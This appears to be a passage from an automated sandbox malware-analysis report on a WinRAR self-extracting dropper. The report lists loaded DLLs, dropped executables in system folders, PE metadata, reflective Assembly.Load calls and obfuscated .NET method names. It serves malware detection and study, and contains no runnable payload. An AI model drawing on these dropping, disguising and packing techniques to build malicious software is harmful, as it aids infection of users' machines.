            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: amsi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: userenv.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rasapi32.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rasman.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rtutils.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: mswsock.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: winhttp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: dnsapi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: winnsi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: C:\serversessionmonitor\blockfont.exeDirectory created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeDirectory created: C:\Program Files\Windows Portable Devices\8057c8f30c1a8eJump to behavior
            Source: 5P9EdUgv5r.exeStatic file information: File size 1577715 > 1048576
            Source: 5P9EdUgv5r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 5P9EdUgv5r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 5P9EdUgv5r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 5P9EdUgv5r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 5P9EdUgv5r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 5P9EdUgv5r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 5P9EdUgv5r.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: 5P9EdUgv5r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 5P9EdUgv5r.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 5P9EdUgv5r.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 5P9EdUgv5r.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 5P9EdUgv5r.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RjptLIiSqcughaqdf1L.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RjptLIiSqcughaqdf1L.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, t4tDHDy3xyf70ZThD6b.cs.Net Code: nRF0Bp4XLZ System.AppDomain.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, t4tDHDy3xyf70ZThD6b.cs.Net Code: nRF0Bp4XLZ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, t4tDHDy3xyf70ZThD6b.cs.Net Code: nRF0Bp4XLZ
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, t4tDHDy3xyf70ZThD6b.cs.Net Code: nRF0Bp4XLZ System.AppDomain.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, t4tDHDy3xyf70ZThD6b.cs.Net Code: nRF0Bp4XLZ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, t4tDHDy3xyf70ZThD6b.cs.Net Code: nRF0Bp4XLZ
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeFile created: C:\serversessionmonitor\__tmp_rar_sfx_access_check_5694421Jump to behavior
            Source: 5P9EdUgv5r.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7E28C push eax; ret 0_2_00D7E2AA
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7ED46 push ecx; ret 0_2_00D7ED59
            Source: C:\serversessionmonitor\blockfont.exeCode function: 4_2_00007FFD9B8E963B push edx; retf 4_2_00007FFD9B8E963C
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeCode function: 20_2_00007FFD9B8D963B push edx; retf 20_2_00007FFD9B8D963C
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B8F963B push edx; retf 22_2_00007FFD9B8F963C
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeCode function: 37_2_00007FFD9B90562F push ebx; ret 37_2_00007FFD9B905632
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeCode function: 37_2_00007FFD9B8E963B push edx; retf 37_2_00007FFD9B8E963C
            Source: blockfont.exe.0.drStatic PE information: section name: .text entropy: 6.996043713722853
            Source: qwhJcOiWbbUoQMvwnJNr.exe.4.drStatic PE information: section name: .text entropy: 6.996043713722853
            Source: backgroundTaskHost.exe.4.drStatic PE information: section name: .text entropy: 6.996043713722853
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, c8VeNg6RLOVyQqHFv1x.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, JaJ5hR6qqsfGUU4CAIb.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'vC7BKvE1Hh', 'WXhBU29r5A', 'r8j', 'LS1', '_55S'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, UVHsDNelqUENW95F8iI.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'YBE1XqgqG0ko5r2DERv', 'OMTEaQgjsUZZGFUGOxV', 'L4vdHIgLXEQsKuy8LCf', 'NfxpsPgTZAKIkQ6sq6s', 'Uc5TxGgwOMyQtVEEPs4', 'UuVvXkgt4t0hQXph7in'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, wSG768evECvlDqTUcmJ.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'ExxUqxg8aSdSGrSVw74', 'PLujdogE0f1bMcpouCy', 'rVY2rWg5tjEbBvxFtNE', 'uAjoyhgYCwYFDHwrOi1', 'xZOQB0g9RoMBK4pnxDH', 'jtBBetgeM4Zyd2vl132'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, XbJtgReCOk4Bf1sPPxE.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'QuT6Aal1DhCATvFEMVB', 'uopZAKldyoeqbhcSsvu', 'f9moD6lF4dYhNBwmd3f', 'ScKCpalhGYhCNVCRbKV', 'bO7wmllGmO23dhQOQJv', 'Mu0eSMl3uOvCrCGV9vu'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, KoTg3X0nwsWjNk6y4av.csHigh entropy of concatenated method names: '_5u9', 'VmQaoaKRAf', 'ypbGgv4TSA', 'sJOa1m3RYb', 'a8vYuIFUs8cijvNt1it', 'XTutUMFmX1WgRLTneAi', 'os2HynFups3KMxVZnUg', 'CJ31kaFX1MeVQMSgRVo', 'IB7GnIF7yuHwXUrjmKx', 'mvU0t9FzAla9VyXBLRE'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, lhqXAyE0XRxnQU6Flsl.csHigh entropy of concatenated method names: 'WYndU1kFFVHO6uUlO5v', 'ibLo71kh7KstY1vEV5O', 'cZACoWk1qZ5oi9l8rKc', 'PolmlTkdsuVptZy8YeC', 'BCnoPTWL3J', 'XqPsmykBglybtn2Lkds', 'HxXJETkaE1blAIwiidX', 'sMu09hkGBNjnmmVeOXq', 'YmIV6nk3UhRjLoLmhhU', 'OXxtZEkyeC57s3lkIHQ'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, WJnPEKAdPFv9qvPdGbh.csHigh entropy of concatenated method names: 'slrN00JnftxNSvEIn6D', 'zH3GJxJbABl0WhljXPq', 'FxSHedJ2Y2PtZDNbdH3', 'zq8LrZJxkH5CuU4lm0r', 'TDMwuNpYPV', 'WM4', '_499', 'IYfw72Bu3p', 'KdKwLRiLnu', 'lftwxjFaD2'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, axG4xJAngoLZPJlaaeD.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'MilW3VKbrF', 'ctBWGcIbtK', 'On4WRadpa2', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, WsrusayxXuqYoP8ahcl.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'dsXEubYF3k', 'nOEE7brsru', 'kaXELuqYoP', 'YahExclh0x', 'UHLE5YQ84q', 'njPXER4DaiZZiSqP8HL', 'EIYHRk4SO8WutIQeOAK', 'L8PjOR4NCbJe6jMDOjs'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, h5lYQWefq6vHfCRQaNA.csHigh entropy of concatenated method names: 'bZWyRyhH8x', 'fV1ys4cgJ0', 'Vs819WlZL3i2FMstqS1', 'nhMk3tlSnYv83MmZxZo', 'tYwT4vllZ9bLpudrI58', 'deJ28hlKys7GfkoZ9PV', 'ynyeLYlr68e0tlbrRAf', 'RxSgJllRpiSKGYuebQD', 'VSEQXXlo97E6ItMYwNL', 'WxOqWNlMxl3a8iTN2Nb'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, AsKPR9AwP98g7Tn7WsG.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, gF35XVAlfJgwhKc4Fn8.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, t4tDHDy3xyf70ZThD6b.csHigh entropy of concatenated method names: 'DSS0kNDmBS', 'zTs0dsrk1W', 'eYI0u0OMA7', 'Bs007NxGGs', 'zcF0LqoTY7', 'GLn0xv6Ucb', 'XAv05QmXmv', 'lxb36brGUosHPEYc2gJ', 'g9IjhcrFK9T5oKaD6D5', 'X1AinZrhO00clf3CmAE'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, LVTeDfAOyZM3IpY7TQQ.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'D5dwlQifvD', 'vIGwbRMSUa', 'vnAww4gX7U', 'EkswMhAj0H', 'ToPw2fDgfC', 'IbVwWfLxvV', 'WUaspjC5TLmRwkx9O75'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, LmDuN96rXhWiAQlDsPV.csHigh entropy of concatenated method names: 'ObLKlefnIo', 'X4iKwsr6qt', 'iC3KSTCHt9', 'dKuKBuNERo', 'qsiKKt0pDO', 'OfvKUXmXYC', 'wsYK9UxaR0', 'AIDKN2ddeT', 'S1BKFsoWIC', 'lsEKYFh09D'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, ts2i7dALe6ErcGsYj4a.csHigh entropy of concatenated method names: 'qEB2xQUa4d', 'IiWECPJ6nKjIxGDWMS5', 'OYhiPpJijiKU0TibFMh', 'SpKHPxJyKSCWLC7grvB', 'r9F4uuJcLDHnWHSukfi', '_1fi', 'er7MTRTeHg', '_676', 'IG9', 'mdP'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, ATV85FexLXBgqtEbdTe.csHigh entropy of concatenated method names: 'rZtemGNMpE', 'V2I1IAS5TuX3b6XIKiw', 'QL0vX0SYHPpNOHQtwsB', 'h8QFCES8su30BIoIt4w', 'pt3PmDSEsWnrBjYKniM', 'xyeJGJS9H3oe0siF91m', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, pEliLlAg9VImohRyaFR.csHigh entropy of concatenated method names: 'w43lpbVJvL', 'DIulfo6HF1', 'By2lVATbL6', 'WFMlCWGbvV', 'aGAlqBtlkf', 'pEElTFhFqf', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, clCliC6mt5ypbJOdOo4.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, VgX0KW0GI7iyPf9phWU.csHigh entropy of concatenated method names: 'JcdXdeweyo', 'MsVXuKEws9', 'gDGX7n3vLu', 'tVhthH1RLe0dlArKyI0', 'fLL2dv1K2xjhrmC87M2', 'PwgOUU1rkjiCij2reEM', 'amTMYi1oa3pQJiC41xx', 'p5BXKe2IVZ', 'x1XXUUhdTC', 'vweX9Sny5K'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, GwDwxj0ecdrkgTLFKOY.csHigh entropy of concatenated method names: 'Jk1iW2d7it', 'jUxihmkLxb', 'mnEiOnlRWV', 'jwnikEWxi3', 'bmUg7GQzfcGFD83wH78', 'wdeRtcQmFDRDLBs1i9T', 'f1ioYMQuQoJl4ZbbcLK', 'mOEao4vOTotoTuGvCda', 'HWFBZGvH3XbUrJ6ewa9', 'ALpVbbv285hstnFQykR'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, aNMxx3E88YofJuk78La.csHigh entropy of concatenated method names: 'C2MlM7SZWY', 'JTMl2rw4JD', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'YN8lWUbk1K', '_5f9', 'A6Y'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, JXpTBDeR2RDHqAKpfgR.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'FPmcTaNvcP6XKXSHW57', 'bah9OON09YIguufxFWF', 'us29WbN1EStIlRNbUwc', 'I50583Ndy4OMkflYXrO', 'TJYs5cNFIN9lL5roVF8', 'I7QtuxNhmF0LTTDd2Hy'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, GtnJCGfl1tTDnBdR5Z.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'G2QKQBnJJWegPnhlXi3', 'B1lTgHnAIOoPVWr69Ik', 'J6KJYXnsde2aKGjZRdm', 'zCIPEwnqp9G1BJBqF3N', 'oJxHXfnjnqRNPT1hnh4', 'Y4wuGOnLhVhpUvWmWJU'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, z6h58oAQcTlyk3ocbm8.csHigh entropy of concatenated method names: 'JWbboBbdW1', 'uqBbDlFMWR', 'd8bbQx5EfY', 'mB2bj9WNmu', 'tHmbvauTx5', 'GHIBpkeUGqqWZnaWrt9', 'o8p6etemVTipTl8yVub', 'HMwdOaeuFlBmXtyktvZ', 'Ccq8mEez8tk3EPrigeK', 'irOF9mpOkgat1kVUFLl'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, MCnyiwTK0il9OLGiW7.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'FmQPwyboU7pp15gx0o7', 'CTyKCpbMYQuocQSr8qg', 'fok3BWbfqgw86k7irAD', 'cJIBO1b4jigyBZUQBBV', 'N5gs3YbQUG497NSex4v', 's3JkR8bvOZjGLjwI7Q4'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RjptLIiSqcughaqdf1L.csHigh entropy of concatenated method names: 'r2QDs6sB6GtRwVEyOpl', 'V1vDodsaMFYRa56m7Lp', 'IaM9b6sGF7Cm5hIYGnn', 'hZJF7Gs3H0nOwCDeUr7', 'sNVOBEtTs4', 'XnM6xcs6a4JDTxdI58x', 'hvqSi3siAu9PHh3Wl9x', 'EetulbsPCONwspP8C6N', 'Ox1C7fskeiJnSDQVTNa', 'LQ2FNwsWy9CG2R1YdLY'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, vO5diU6Itj2J6EHoRW3.csHigh entropy of concatenated method names: 'WjxBmgms34', 'IvmBuTnbw2', 'vZTB7mgaGG', 'havBLBpAUI', 'ND2Bxyhrf3', 'MwuB5rrB7p', 'K1mBZQZqHR', 'lL0B4axjZs', 'rT5Btj1ySw', 'nWmBHfwvys'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, wWN1y86E9MTCT1PjRpu.csHigh entropy of concatenated method names: 'g3Ls9GKqsU', 'ki76s73QwkdVkJrUki4', 'g2nPuY3vtuAgEL1nfcP', 'm0VY8N3fO4SH0lbSTGn', 'pyYXpC34OvdlvMSDSS4', 'w4dGh85xDA', 'avFGOqk2wa', 'GmxGk6CdQQ', 'h9dGdtEaoU', 'klpGus2434'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, CucLx40zSRyK5n7um9y.csHigh entropy of concatenated method names: 'Sx0GMlCliC', 'M5yG2pbJOd', 'Do4GWh4Bmg', 'Kl0Qa1GpaDmhVBYWLSw', 'haaDnXGCIdLBHRPUU21', 'Ub319iG901SEnKCxIIh', 'WYuoOCGe0qcKMyw6RB2', 'sXf8eGGJUxa8TeeGmet', 'mbZ8fOGAo83xnIoawoB', 'BH513aGsCh6KA7aOB3p'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, Nq6HD5x1mem2QvFS0C.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'uV7VBpxEyB11L3LPcQQ', 'CPN8VOx5s5ReTVGUP3K', 'YfE46AxYt0fK6IQ8GMa', 'eIOLDhx9NZLYiUPCe5b', 'IMMWVgxe7TOAVTJAVZo', 'AafLJRxpo9rNHggOidm'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, UYK8MFygjCs6MBDQePx.csHigh entropy of concatenated method names: 'vMJylWaqVU', 'c3tybdhhWp', 'JXpywTBD2R', 'P5uDaEZkiL79BLA7Ueq', 'YyZnYKZWmsSDiADs8vb', 'zZ2uyWZ8skQGYZIqjPB', 'xoiteOZEUuMhwViZGxr', 'vJtlF5Z5Lg4fUe8ajU8', 'ahuidUZY8UfmY0Z6quc', 'FLLZ73ZiLbIB8AjJyyi'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, Hjl6EneNYwxTaTCypeK.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'NmyJJwgOWcNMRvc4UJE', 'AdsuvKgHZaarqAXKMx0', 'nNa3LGg2mkDpc1O460L', 'q0Z3AJgxRjLO8sRHysg', 'vOuc41gnabiUjws88Ch', 'jjRkpvgboOhlMVP8Y8M'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, u3qBBam7uymWWK1s6C.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'EIvRKKbIhXK7MtXiLN8', 'BPtiY2bXiIgkq3swXV3', 'bVXbMDb7PZpNYCJxYJu', 'ItMubabUO8yZTMyVkw8', 'hm67GFbm8YMm37LRpi9', 'picXP2bucPOmsicg9Ud'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, LP1XoyeQNFngUkgwXa7.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'NuNgMmgGLy3FYKO27L6', 'mvAACKg3r7vCJ2T1pIf', 'hcCCJ5gBtEugTQaLw3o', 'F7ftTYgaoZu9tGDB4xJ', 'jVQn3kgyrC8cPkofXZp', 'tIHDdfgcg5n6TgiqSF7'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, UqiqRGEulfRR9259D1M.csHigh entropy of concatenated method names: 'q6Slg8YXs0', 'qeAau45UGtuuG5kQiCY', 'M9QJtJ5XyWqw98O6PK2', 'v2O1mU57nmVieK8JWIY', 'aYT3Xv5mS1sGT8MfRmX', 'nFCvbn5uhHQlL7CVRe6', 'IRWwoi5z0UbvxUMvek5'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, ADoui4n9ETRheJOBmh.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'MbeFocn4UOV58TFJH60', 'jiecmrnQiVotGHTfm7Y', 'Pg5G74nvqdwRb0yvPrj', 'vqnMx8n0H4UW1sgpWIW', 'FrOKTPn1E2iMm9MsGv6', 'XgP3LmndZhCbPu8R3Q8'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, psEeQleTfmcO4XF3FLo.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'VMLLW6lPU7gxrd3aTVx', 'JiWZXilkbRo9H2Ye2bl', 'lvrBeblWCcGKIRsW6hu', 'VXrpBql8xuax4UK3Q71', 'vFtJWFlEQKDcv8lIxO9', 'lVWyUul5xVSO6WSLQ7v'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, CERs2p6abqhKrSGSgGT.csHigh entropy of concatenated method names: 'q8Ys7a09Fl', 'uXTsLhRfBW', 'ggNsxMxx38', 'rofs5Juk78', 'HamsZxJRdl', 'yxNyZI3ueqZAbNFYrYH', 'ehBvoT3zrProQxi1Pll', 'kjPt9h3USvtedyf9OBL', 'qEuHU43m3eweAOG2nLl', 'V6a5rABOv8lvRSxBQUK'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, Xuhydj6w3Pap3lwVuB9.csHigh entropy of concatenated method names: 'PgwSdbNf6j', 'yEnSuSTqs2', 'u8cS7DLKQE', 'zH6SLdQb2V', 'paISxlKpXo', 'Rso9hhavq5dU2FTMaql', 'GWbcgDa4LhSX1TUWAT2', 'OcLFE7aQgEyFZM9Bg1p', 'm1Sw3Sa0UrkyqAw3jYp', 'iLBynqa1xjvuYBu1Jpj'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, PuWoPuEkIRZKxp7uVPw.csHigh entropy of concatenated method names: 'DsSPc2IikQ', 'TaKPIl1qnT', 'EuxPJQ68JW', 'LLPPrAfohU', 'ChvP11UlUa', 'iF2PmnZrR4', 'pNgGRc5jndI0OxlZXfp', 'na1Cwn5soTGjqcOJJbq', 'LoyW8I5q37aaqYplVYp', 'pgkAJH5LPV9T0OXmghf'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, nbJiqQ0QgwScmc3078g.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'xFNswwFrTYdXyEBsiJs', 'WdmuWRFRotjiWeV6226', 'c9XlRJFoJRmxO7dlfFV', 'Kd9exMFMG1SfHt4h7ky'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, EenlBfeaY0Ztkrk7qu4.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'fBt0WfNa2jZK5XMKiit', 'O6R0GgNy4koA92DmAMN', 'gVF961Nc1ndRcRHAP9K', 'e8DfrvN63QhcIwHFGqp', 'oKSNZ1NiBkDA4Z9SUcd', 'opIqmeNPZ99jAHUllxB'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, JOxSpa63JmVk27xbF3S.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, uB794cIYlidHb77A6R.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'w89ZAabyDyb8oodU5Ap', 'dWhZFRbcCapDIX5VT2k', 'mLVFVYb6pbiRBibWIpU', 'MHd0v4biQhHOn7yM8T9', 'SiTfOWbPXgXM46X8rsk', 'mesHlTbkmhlD2b385Mu'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, LcN7ZEehqLnKm9sAvFX.csHigh entropy of concatenated method names: 'FSJepkYayw', 'ReQ5HaS2YNWrQZOLC7y', 'TwCBnbSxmedkfjESMff', 'HDBUFdSODJwIqH3lj4p', 'ydQ2tfSHtCSGbYC7lIR', 'k4quaPSnfHdY7sTMIKK', 'H2HoKHSb1Stu3aAg0QZ', 'RZUpgqSVTu0YRgrkiNx', 'gwKeV0il9O', 'qZQb1hSDHZ3iJ0UP86P'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, pEChKUrhkYZtGNMpEA.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'zNMKxtbAx0X537BlPRs', 'cfFdrxbsqxK2EgTLrc3', 'rPLHJubqTdp0K5LZwU7', 'OLH0NPbjYExGqnpkM0k', 'kDSpEsbLvWhjoXwsIQj', 'bhT8ZSbTQTqCXquu8Zq'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, JUfdlc6PJygYRBCdy2f.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'WJnSgPEKPF', '_3il', 'w9qSevPdGb', 'CnYSyVcu6a', '_78N', 'z3K'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, TVEnUv0B78YIfRZrtck.csHigh entropy of concatenated method names: 'RWmXHDBqd4', 'klKXnnA1sT', 'FMjXptK2fD', 'JOxXfSpaJm', 'C4YBlU1WxKSO342cIOe', 'rhBWHV18eALGwxvsohS', 'mmRDng1Eo4kJHe6rSW5', 'tvU5991Plb67tNKNhpD', 'rgDAQb1kU5jKd0hRvA0', 'kF2Kgh15TdGHbpoLgK0'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, kisMwoBLNY98kQQgmu.csHigh entropy of concatenated method names: 'o5A', '_612', 'C8E', 'k71', 'k3c', '_591', 'SwJ2g8p8MO0PkHrkeB', 'KEvns1Cq01UrntEsld', 'Xuo0NL9Ndjj9SbMTyI', 'maV5uwehY4JGlD2AQx'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, BM1XSAyycRMguVbvCN2.csHigh entropy of concatenated method names: 'WBMyVLPhL0', 'RLcyC6KrWZ', 'HExyqIGM2x', 'tjCyTVY6pQ', 'svlyc2KkqK', 'rgXyIvhrl0', 'IBS33QK4pyxYwjn0suX', 'HEJJpPKQYAwlrY88BAo', 'gIxM6fKMwGyJfXUMoN3', 'Gle8CfKf8BZqmSfqQDb'
